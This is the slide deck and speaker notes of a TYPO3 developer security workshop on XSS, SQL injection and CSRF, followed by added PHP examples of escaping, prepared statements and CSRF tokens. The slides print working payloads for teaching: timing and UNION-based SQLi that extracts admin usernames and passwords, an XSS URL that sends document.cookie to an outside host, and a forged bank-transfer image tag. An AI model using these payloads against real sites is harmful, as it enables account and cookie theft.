T3DD10 Security Workshop
Slides of the T3DD10 Security Workshop

Published in: Technology, News & Politics
  • Who has already heard of XSS, CSRF?

  • since 2005, security since 2008, leader since end 2009


  • Application security, not personal or governmental


  • invest in resources taken for security / potential loss when hacked
    => If a hacker has to invest much more than he or she gets back, he or she won't attack
    => Your system is secure
    An application must constantly be improved
    => As hackers and hacker tools evolve, the security concepts have to evolve too


  • give the least information possible (wizard.dat), Hide Files from Webroot, DB Users, Apache User
    User Data: GET, POST, COOKIE, DB?
    Escaping is all about context
    Defense in depth: as many defense lines as reasonable (health record)
    TYPO3, no private data stored in DB or on hard disk, not even images
    authentication through a 64-bit hash calculated from the password
    all data from an external DB where everything is encrypted (decrypted with the hash)
    Obscurity: e.g. alternate telnet port; hide source

  • Injecting Up: "> </script>
    Injecting Down:
    <img src="...UNTRUSTED DATA HERE..." />
    <img src="javascript:alert(document.cookie)" />
    „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“




  • Input Validation: „a>b“ or „Me & you“

    twitter attack
    Escape not easy because of the different contexts of HTML

    http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/
    <script>...NEVER PUT UNTRUSTED DATA HERE...</script> directly in a script
    <!--...NEVER PUT UNTRUSTED DATA HERE...--> inside an HTML comment
    <div ...NEVER PUT UNTRUSTED DATA HERE...=test /> in an attribute name
    <...NEVER PUT UNTRUSTED DATA HERE... href="/test" /> in a tag name

    Contexts: HTML-Element, HTML-Attribute Value, JS-Variable Value, URL Parameter



  • SELECT title, description, body FROM items WHERE ID = 2 and 1=2
    SELECT title, description, body FROM items WHERE ID = 2 and 1=1

    1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

    Defense in depth (saltedpw)
    http://localhost:8888/introductionpackage/t3dd10/pi1/?L=1%29%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0%20from%20be_users%20where%20admin%20in%281

  • Escaping:
    * use the TYPO3 API for that
    * fullQuoteStr(): ‘‘ are necessary


  • POST can be forged, referrer can be spoofed
    Double Submit Cookies
    *sending session id as cookie and form values
    Downsides: session hijacking, httponly for cookies not valid any more
    Challenge-Response:
    *CAPTCHA
    *Re-Authentication (password), confirmation? alert() via JavaScript clickable?
    *One-time Token
    Synchronizer Token Pattern
    *Generate one or more random tokens for a session (per session or per request)
    *randomize token variable name (per request downside: browser back button)
    http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

  • Privilege Escalation
    Session Fixation
    Information Disclosure
    Path Traversal (Files)
    Remote Code Execution
  • Transcript

    • 1. TYPO3 Developer Days - Elmshorn 2010 Inspiring Security Workshop sha
    • 2. T3DD10 Security Security flaws versus Security concepts 02.07.2010 Helmut Hummel <helmut@typo3.org>
    • 3-10. Introduction Do you ... ... know me? ... have a working development environment? ... ever heard of XSS? ... ever heard of SQLi? ... ever heard of CSRF? ... ever found a vulnerability in a TYPO3 extension? ... reported your findings to security@typo3.org? Inspiring people to T3DD10 Security Workshop share
    • 11. Did you ever hack for
    • 12. Security Flaws versus Security Concepts Agenda: General Security Concepts; Hacking / Code Review Session; Getting into details about some vulnerability types; Writing down best practices for TYPO3 developers
    • 13. What is Security?
    • 14. Security is not a state
    • 15-20. What is Security? Security is a process; The security of an application must be proven over time; Security must constantly be improved; An application can never be secure ... but only not insecure at a particular time; The „costs“ for security must relate to the possible impacts
    • 21-28. What is Security? General Security Concepts: Minimize Exposure / Least privilege; Don't trust user data, don't trust Services; Filter->Validate->Escape, never mix them up; Defense in depth; Positive Security Model (Whitelist); Use logging; Avoid security by obscurity
    • 29. Cross Site Scripting (XSS)
    • 30-35. Cross Site Scripting XSS: Persistent / non-persistent XSS; Injecting Up / Break out of the current DOM context; Injecting Down: Stay in the current context, but use the possibilities: <img src="javascript:alert(document.cookie)" />
    • 36-39. Cross Site Scripting Preventing XSS: Input validation and/or filtering is not enough; Escape correctly, depending on the context; <script>...NEVER PUT UNTRUSTED DATA HERE...</script> <img src="... OR HERE ..." /> ... because then you're doomed
    • 40-41. Email Header Injection: PHP mail() function and From: header; Use filter_var($mail, FILTER_VALIDATE_EMAIL); do not allow chr(10) or chr(13)
    • 42. SQL Injection (SQLi)
    • 43. SQL Injection SQLi: (blind) SQL Injections; Timing attacks; UNION SELECT; Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0 from be_users where admin in(1); Check your TypoScript!
    • 44-48. SQL Injection Prevent SQLi: Prepared Statements / PDO; Escaping; Typecasting (intval), whitelist validation; Using an ORM (extbase, FLOW3, QCodo, ...)
    • 49. Cross Site Request Forgery
    • 50. Cross Site Request Forgery CSRF: Executing arbitrary actions on behalf of a victim; <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">; stored CSRF (like XSS); Targeted Emails; Probably requires some kind of social engineering
    • 51. Cross Site Request Forgery Prevent CSRF Limiting to POST and checking referrer not enough Double Submit Cookies Challenge-Response Synchronizer Token Pattern No Cross-Site Scripting (XSS) Vulnerabilities
    • 52-53. Application Vulnerabilities More: Information Disclosure; HTTP Response Splitting; Path Traversal; Privilege Escalation; Session Fixation; LDAP Injection; Remote Code Execution
    • 54. T3DD10 Security Workshop Resources
      PHP-Sicherheit (Christopher Kunz and Stefan Esser)
      Essential PHP Security (Chris Shiflett)
      http://www.owasp.org/
      http://www.ibm.com/developerworks/opensource/library/os-php-secure-apps/index.html
      http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
    • 55. T3DD10 Security Workshop SQLi Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi1/? no_cache=1&tx_coolextension_pi1[showUid]=1%2 0UNION%20SELECT%20uid,%20pid,%20tstamp, %20crdate,%20cruser_id,uid%20as %20t3ver_oid,uid%20as%20t3ver_id,uid%20as %20t3ver_wsid,uid%20as%20t3ver_label,uid%20as %20t3ver_state,%20uid%20as%20t3ver_stage,uid %20as%20t3ver_count,uid%20as %20t3ver_tstamp,uid%20as%20t3_origuid,uid %20as%20sys_language_uid,uid%20as %20l10n_parent,uid%20as %20l10n_diffsource,deleted,disable%20as %20hidden,starttime,endtime,%20usergroup%20as %20fe_group,username%20as
    • 56. T3DD10 Security Workshop XSS Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3Cscript %3Ewindow.location.href+%3D+%27http%3A%2F %2Ftypo3.org%2F%3Fcookie%3D%27+%2B +document.cookie%3B%3C%2Fscript%3E
    • 57. T3DD10 Security Workshop XSS Exploit bit.ly/bpJzpF http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3C%2Fform %3E%3Cform+action%3D%22http%3A%2F %2Ftypo3.org%22%3E%3Cinput+type%3D%22text %22+name%3D%22name
    • 58. inspiring people to share.
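
Added example for slides 36-39 and the speaker notes on contexts (HTML element, HTML attribute value, JS variable value, URL parameter): one escaping helper per context, plus a scheme whitelist for the "injecting down" case where correct attribute escaping still leaves a javascript: URL in place. This is not code from the workshop or from TYPO3; the function names and the fallback image path are hypothetical.

```php
<?php
// Added example, not TYPO3 API: one helper per output context from the notes.

// HTML element content and quoted HTML attribute values.
function escHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// JS variable value inside <script>: JSON with <, >, &, ' and " hex-escaped,
// so the data cannot close the string literal or the script element.
function escJsValue($value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return json_encode($value, $flags | JSON_THROW_ON_ERROR);
}

// Single URL parameter value.
function escUrlParam(string $s): string
{
    return rawurlencode($s);
}

// "Injecting down": escaping keeps javascript:... inside src="", but the URL
// itself is still hostile. Positive model: only http(s) or a local path.
function safeUrl(string $url): ?string
{
    if (preg_match('/[\x00-\x20]/', $url) === 1) {
        return null; // whitespace or control characters anywhere
    }
    if (preg_match('#^(https?://|/(?![/\\\\]))#i', $url) !== 1) {
        return null; // any other scheme, or a protocol-relative //host URL
    }
    return $url;
}

function renderProfile(string $name, string $imageUrl): string
{
    $src = safeUrl($imageUrl) ?? '/placeholder.png'; // hypothetical fallback
    return '<p>Hello ' . escHtml($name) . "</p>\n"
        . '<img src="' . escHtml($src) . '" alt="' . escHtml($name) . "\" />\n"
        . '<a href="/search?q=' . escHtml(escUrlParam($name)) . "\">more</a>\n"
        . '<script>var userName = ' . escJsValue($name) . ";</script>\n";
}

// Constructed inputs: the two harmless strings from the notes, then the
// "injecting up" and "injecting down" strings the slides already show.
$samples = [
    ['a>b', '/img/a.png'],
    ['Me & you', 'https://example.org/me.png'],
    ['"> </script>', 'javascript:alert(document.cookie)'],
];
foreach ($samples as [$name, $imageUrl]) {
    echo renderProfile($name, $imageUrl), "\n";
}
```

The first two inputs show why input validation cannot replace escaping: both are legitimate values that must be accepted and still need encoding on output.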
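
Added example for slides 43-48 (prepared statements / PDO, typecasting, whitelist validation): the concatenated query from the notes beside a prepared statement, a validated variant and a whitelisted sort column. This is not workshop code; it assumes the pdo_sqlite extension, uses the `items` and `be_users` table names from the page with constructed rows, and the function names are hypothetical.

```php
<?php
// Added example, not workshop code. Runs against an in-memory SQLite database;
// table names follow the notes, all rows are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE items (ID INTEGER PRIMARY KEY, title TEXT, description TEXT, body TEXT)');
$pdo->exec('CREATE TABLE be_users (uid INTEGER PRIMARY KEY, username TEXT, password TEXT, admin INTEGER)');
$pdo->exec("INSERT INTO items VALUES (1, 'First', 'd1', 'b1')");
$pdo->exec("INSERT INTO items VALUES (2, 'Second', 'd2', 'b2')");
$pdo->exec("INSERT INTO be_users VALUES (1, 'admin', 'constructed-hash', 1)");

// The 'before': request data concatenated into the statement.
function findItemConcatenated(PDO $pdo, string $id): array
{
    $sql = 'SELECT title, description, body FROM items WHERE ID = ' . $id;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Prepared statement: the value travels separately from the SQL text.
function findItemPrepared(PDO $pdo, string $id): array
{
    $stmt = $pdo->prepare('SELECT title, description, body FROM items WHERE ID = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Whitelist validation before the query: reject anything that is not a
// positive integer instead of silently truncating it as intval() would.
function findItemValidated(PDO $pdo, string $id): array
{
    $valid = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $valid === false ? [] : findItemPrepared($pdo, (string) $valid);
}

// Identifiers cannot be bound as parameters, so a sort column is whitelisted.
function listTitles(PDO $pdo, string $sortBy): array
{
    $column = in_array($sortBy, ['title', 'description'], true) ? $sortBy : 'title';
    return $pdo->query("SELECT title FROM items ORDER BY $column")->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs modelled on the strings in the notes.
$inputs = [
    '2',
    '2 and 1=2',
    '2 and 1=1',
    '2 UNION SELECT username, password, admin FROM be_users',
];
foreach ($inputs as $in) {
    printf(
        "%-56s concatenated=%d prepared=%d validated=%d\n",
        $in,
        count(findItemConcatenated($pdo, $in)),
        count(findItemPrepared($pdo, $in)),
        count(findItemValidated($pdo, $in))
    );
}
// An unknown sort column falls back to the default instead of reaching the SQL.
echo implode(',', listTitles($pdo, 'not_a_column')), "\n";
```

Only the concatenated variant changes its row count with the appended conditions, which is the true/false signal the blind technique in the notes relies on.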
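
Added example for slide 51 and the CSRF notes (Synchronizer Token Pattern, per session or per request): a token bound to the server-side session, emitted as a hidden field and checked in constant time. This is not code from the workshop or from TYPO3; the function names, the `csrf_token` field name and the `transfer` form id are hypothetical.

```php
<?php
// Added example; function names and the form id are hypothetical. A plain
// array stands in for $_SESSION so the script also runs from the CLI.

function csrfToken(array &$session, string $formId): string
{
    if (!isset($session['csrf'][$formId])) {
        // Unpredictable per-session token, created on first use of the form.
        $session['csrf'][$formId] = bin2hex(random_bytes(32));
    }
    return $session['csrf'][$formId];
}

function csrfField(array &$session, string $formId): string
{
    $token = htmlspecialchars(csrfToken($session, $formId), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '" />';
}

// $oneTime = true gives the per-request variant: the token is consumed on
// success, so a replayed or back-button submit fails (the downside in the notes).
function csrfCheck(array &$session, string $formId, array $post, bool $oneTime = false): bool
{
    $expected = $session['csrf'][$formId] ?? null;
    $given = $post['csrf_token'] ?? null;
    if (!is_string($expected) || !is_string($given)) {
        return false; // no token issued, or none submitted
    }
    $ok = hash_equals($expected, $given); // constant-time comparison
    if ($ok && $oneTime) {
        unset($session['csrf'][$formId]);
    }
    return $ok;
}

// Constructed walk-through of three requests against one session.
$session = [];
echo csrfField($session, 'transfer'), "\n";
$legit = ['acct' => 'MARIA', 'amount' => '100', 'csrf_token' => $session['csrf']['transfer']];
$forged = ['acct' => 'MARIA', 'amount' => '100000']; // cross-site request: no token
var_dump(csrfCheck($session, 'transfer', $forged, true));
var_dump(csrfCheck($session, 'transfer', $legit, true));
var_dump(csrfCheck($session, 'transfer', $legit, true)); // replay after consumption
```

Unlike Double Submit Cookies, the expected value never leaves the server-side session, so session cookies can keep the httponly flag.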
